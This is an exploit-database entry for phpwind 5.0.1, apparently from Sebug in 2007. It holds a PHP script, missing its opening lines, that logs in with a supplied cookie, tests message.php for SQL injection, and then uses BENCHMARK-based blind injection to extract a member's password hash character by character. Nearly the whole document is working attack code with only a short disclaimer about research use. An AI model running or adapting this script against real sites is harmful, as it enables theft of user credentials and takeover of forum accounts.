phpwind 5.0.1 SQL Injection Vulnerability Exploit
SEBUG-ID:6703
SEBUG-Appdir:PHPWind
Published:2007-04-26
Exploit:
[www.sebug.net]
The following procedures (methods) may contain something offensive,they are only for security researches and teaching , at your own risk!
The following procedures (methods) may contain something offensive,they are only for security researches and teaching , at your own risk!
0 ? intval($argv[3]):1;
echo \"\\r\\n#Logging\\t........\";
if(islogin()) echo \"Login Ok!\\r\\n\";
else die(\"Not Login!\\tCheck Your Cookie and Useragent!\\r\\n\");
echo \"#Testing\\t........\";
if(test()) echo \"Vul!\\r\\n\";
else die(\"Not Vul\");
$hashtable=\'0123456789abcdef\';
$count=0;
echo \"#Cracking\\t\\r\\n\\r\\n\";
for($i=1;$i<=16;$i++){
echo \"第\\t$i\\t位:\";
$subpass=crack($i+8);
$password=$password.$subpass;
echo \"$subpass\\r\\n\";
}
echo \"Password:\\t$password\";
echo \"\\r\\nGood Luck $count Times\\r\\n\";
function send($cmd,$path)
{
global $bbspath,$server,$cookie,$count,$useragent,$debug,$evilip;
$path=$bbspath.\"$path\";
$message = \"POST \".$path.\" HTTP/1.1\\r\\n\";
$message .= \"Accept: */*\\r\\n\";
$message .= \"Accept-Language: zh-cn\\r\\n\";
$message .= \"Referer: http://\".$server.$path.\"\\r\\n\";
$message .= \"Content-Type: application/x-www-form-urlencoded\\r\\n\";
$message .= \"User-Agent: \".$useragent.\"\\r\\n\";
$message .= \"Host: \".$server.\"\\r\\n\";
$message .= \"Content-length: \".strlen($cmd).\"\\r\\n\";
$message .= \"Connection: Keep-Alive\\r\\n\";
$message .= \"Cookie: \".$cookie.\"\\r\\n\";
$message .= \"\\r\\n\";
$message .= $cmd.\"\\r\\n\";
$count=$count+1;
$fd = fsockopen( $server, 80 );
fputs($fd,$message);
$resp = \"\";
while($fd&&!feof($fd)) {
$resp .= fread($fd,1024);
}
fclose($fd);
$resp .=\"\";
if($debug) {echo $cmd;echo $resp;}
// echo $resp;
return $resp;
}
function sqlject($sql){
global $uid;
$data=\'action=pubmsg&readmsg=0)\';
$data=$data.\" union select BENCHMARK(1000000,md5(12345)) from pw_members where uid=$uid and $sql\".\'/*\';
$echo=send($data,\'message.php\');
preg_match(\"/Total (.*)\\(/i\",$echo,$matches);
if($matches[1]>2) return 1;
else return 0;
}
function test(){
global $uid;
$data=\'action=pubmsg&readmsg=0)\';
$echo=send($data,\'message.php\');
if(strpos($echo,\'MySQL Server Error\')) return 1;
else return 0;
}
function islogin(){
global $uid;
$data=\'action=pubmsg&readmsg=0)\';
$echo=send($data,\'message.php\');
if(strpos($echo,\'login.php\"\')) return 0;
else return 1;
}
function crack($i){
global $hashtable;
$sql=\"mid(password,$i,1)>0x\".bin2hex(\'8\');
if(sqlject($sql)){
$a=8;
$b=15;}
else {
$a=0;
$b=8;
}
for($tmp=$a;$tmp<=$b;$tmp++){
$sql=\"mid(password,$i,1)=0x\".bin2hex($hashtable[$tmp]);
if(sqlject($sql)) return $hashtable[$tmp];
}
crack($i);
}
?>// sebug.net [2007-04-26]